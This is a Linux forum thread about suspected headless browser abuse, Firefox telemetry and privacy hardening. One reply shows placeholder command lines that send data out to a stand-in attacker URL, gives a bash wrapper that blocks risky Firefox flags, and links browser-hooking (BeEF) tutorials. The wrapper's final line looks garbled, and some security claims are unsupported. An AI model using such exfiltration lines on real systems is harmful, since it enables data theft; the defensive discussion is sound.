- This topic has 7 replies, 3 voices, and was last updated Sep 1-6:42 pm by anilkagi.
-
Posts
-
ModdIt
Yesterday, again, I had an unresponsive Tor Browser, High CPU, Network traffic and disk usage.
i restarted TOR with the broom symbol to get a fresh instance. Tor closed but no browser window came up.There was a spike on Disk usage, memory consumption and CPU were pretty high, network traffic also shown. Far more
than the normal keepalive pings to router. I had an otherwise empty desktop.Tor is latest verified, as described in post from anilkagi. Visited sites were some kids reported to have caused this effect,
at first sight they are not weird or nasty, not in darknet.I have found a lot of ways to start Firefox, (the browser in tor) headless, up to now no way to block that behavior completely.
Going in to the documentation i found headless firefox can do a lot without the users knowledge. On a high powered computer
without Conky running it might go unnoticed. Maybe taking and sending screenshots, maybe more. i have found no way to see what it
is doing. in earlier cases we had 100% cpu, that seems to have changed, maybe to make the take over less noticeable.Fazit for now, watch conky, both Chrome and Firefox can be run headless remotely controlled without your input.
Anonymous
Maybe taking and sending screenshots, maybe more
Aye, headless (available in firefox v55+) poses a danger.
Brings a risk of silent cryptomining, data exfiltration, botnet node…In addition to headless, it may be desirable to forbid use of several other command line options:
https://developer.mozilla.org/en-US/docs/Mozilla/Command_Line_Options -start-debugger-server -search <exfiltrated_string_here> -url <hxxp://badsite.com/grabbit?urlencoded-exfiltrated-data-here> -devtools <hxxp://badsite.com/grabbit?urlencoded-exfiltrated-data-here> -kiosk (ff v71+) (cannot use Esc or F11 to exit the mode) https://support.mozilla.org/en-US/kb/firefox-enterprise-kiosk-modeWhich options to block? That’s a personal decision.
Although many folks would argue that it provides a great “convenience”, I have chosen to block the firefox “search” commandline option on all the local machines I configure and maintain. The “Search” button (or context menu action) within certain GUI programs, if no text is currently selected/highlighted… will fallback to launching browser and passing the content of GTK CLIPBOARD or system clipboard as a search string. Ouch!I recommend using a wrapper script to marshal launch of the web browser.
First, find the executable file (“torbrowser”, “firefox”, “firefox-esr”, “mybrowser”)
Make sure you have truly identified the executable (vs a symlink, or launcher script)
Example:
$which mybrowser
/usr/bin/mybrowser
$file /usr/bin/mybrowser
/usr/bin/mybrowser: ELF 64-bit LSB shared object, x86-64, ver…and rename it to (for instance) “mybrowser_real”
Example:
sudo mv /usr/bin/mybrowser /usr/bin/mybrowser_realthen create the wrapper script and SaveAs /usr/bin/mybrowser
Example:#!/bin/bash if [ "$(id -u)" = "0" ]; then yad --text="\n\n\nPREVENTED an elevated-permissions LAUNCH \n\n\n" \ --width=600 --center --text-align=center --button="gtk-ok" --title="!" exit fi if [ $# -gt 0 ]; then until [ $# -eq 0 ]; do ### leading wildcard b/c I didn't check whether ff recognizes ### only exact "--headless" (double-dash) vs single, or no dash ### ref: https://developer.mozilla.org/en-US/docs/Mozilla/Command_Line_Options case "$1" in *headless|*start-debugger-server|*search|*devtools|*kiosk) yad --text="\n\! ! !\n\nPREVENTED LAUNCH OF HEADLESS (or kiosk or...)\n" \ --width=600 --center --text-align=center --button="gtk-ok" --title=" !" exit;; esac shift done fi mybrowser_real "@"“but, but recent versions of __xyz__ already won’t allow launching as root anyway”
The guarding provided by the wrapper causes no harm, and provides the benefit of a visual cue to indicate that “something” (“Help” or “Search” buttonclick within a program? A silent/malware script?) has attempted a launch.
related readings:
Hooking a Browser with the Browser Exploitation Framework (BeEF)
.
(video) Take Control of Web Browsers with BeEF [Tutorial]
(article, to accompany the above video) Take Control of Web Browsers with BeEF [Tutorial]
.
https://github.com/beefproject/beef
.
https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html@skidoo, many thanks for the very informative post.
The wrapper script will be incorporated on my master stick shortly.couple of further reminders or primers for new users.
It is a good idea to get rid of WEB RTC.
If using Firefox you may also want to remove the hidden extensions in the /browser/features folder. Depending on installation method the path can vary, in AntiX Mx /opt/firefox/browser/features.
Take a look in /home/yourusename/.mozilla/firefox/”varies”.default-release/datareporting, why see next lines.
The firefox 80 from MX which I installed yesterday ignored the interface switches and sent data to Mozilla with two id,s which remained constant over several data transfers, I could trigger data sending by changing any config settings. I have set folder permissions there to write only, data sets are increasing.If available use LAN not WLAN, even my neighbors kids compromise wireless when they get bored, Remember even PWgen –secure option and maximum length password is no protection. If you have a crappy provider router forced on you chain it with a decent one. A hardwire raises your security somewhat.
anilkagi
Hi, @Moddit.
I have made changes concerning Web RTC and Data Reporting and some others things in the about:config page of firefox, by setting ‘datareporting.healthreport.uploadEnabled’ entry to false and by changing ‘media.peerconnection.enabled’ value to false.
However after reading your post, I checked the ~/.mozilla/firefox/Profile/datareporting/archived/ folder and found that there were two folders one for every month, I suppose and in the August folder there are 153 text files. All are named with some random number, I suppose but with the extensions ‘.main.jsonlz4’. Only one has the extension ‘.event.jsonlz4’. Surprisingly almost all of them are empty. I checked randomly.
And there is already a folder for September, which contains 3 files named with some random number but their extensions are different. They are ‘.modules.jsonlz4’, ‘.optout.jsonlz4’ and ‘.health.jsonlz4’ These are empty too. I opened them as root. There is no data on them.
Are those files empty because of the changes to the about:config?
Is it OK to delete this ‘datareporting’ folder, wouldn’t that make firefox instable?
If I delete this ‘datareporting’ folder, wouldn’t it be created again?And mysteriously all this is on the Frugal install. However, the dates that these files in the August folder were modified, are not on continuous dates. The dates are like 2, 3, 4, and 6 to 15 continuous and then all the dates in between are missing and start again from 24, 25, 27, 29 and no 30 and no 31. As far as I can remember I have used firefox daily without missing on any day. In between I have Remastered, but I don’t remember the dates on which I Remastered, but I don’t think I have Remastered on the 17 days that these files were created. I will now have to wait for a few days, without Remastering and check again if any files get created and saved.
I don’t understand this behavior of firefox.
@Skidoo, though your first post went above my head, I didn’t understand an iota of it and I am making further efforts, those links opened an entirely new world for me. Great many thanks.
Hi anilkagi, fun right, its like sitting on a hornets nest, you think the stings have stopped and the next wave starts.
I mostly use Palemoon and increasingly Tor and Badwolf, only thing missing there is a way to setup meta Ger as default. Have to compile for that I think. I failed dismally last try..I made the data reporting folder non writeable, Firefox still works.
Just decided to put the same client ID in all installations I can get my fingers on.That is a unique id in the data reporting folder state.json, will ask my friends in Vietnam to add it to their installations and pass it on.
We can not stop Mozilla following us around but maybe polluting some data is not a bad idea. Similar to clicking on random or chosen misleading ads.
That game is really funny, i was even offered Ladys plus sized underwear in Amazon after a while, i never searched or looked at that there. Guess my profile is for a crazy fat drag queen.{“clientID”:”963111bd-efaa-493c-a37f-6a799a213cbe”}. For anyone who may like to join in.
The unique systemd machine id is not generated in AntiX so that will not totally spoil the effect.Having watched traffic I have no trust in mozilla. Almost all of their sites are in my hosts file.
Hello Moddit,
Fun? Yeah, like a scary movie, :).
I think it is like a pyramid of innumerable layers of security-malicious activity, and this is still the bottom. Rising above is a fun & learning exercise; like rising from Flyweight to Heavyweight boxing or the levels of a game. Though the malicious activity in the layer above is lesser in quantity than the layer below, it is more in quality, technically higher grade and the learning curve steeper. Rising above gets tougher and tougher for both.
So be it. That’s life. Accept it and keep moving. An endless journey. Knowing things is the key.
It is said “If you know your adversary and you know yourself, you need not fear the result of a hundred battles.”. 🙂
- You must be logged in to reply to this topic.
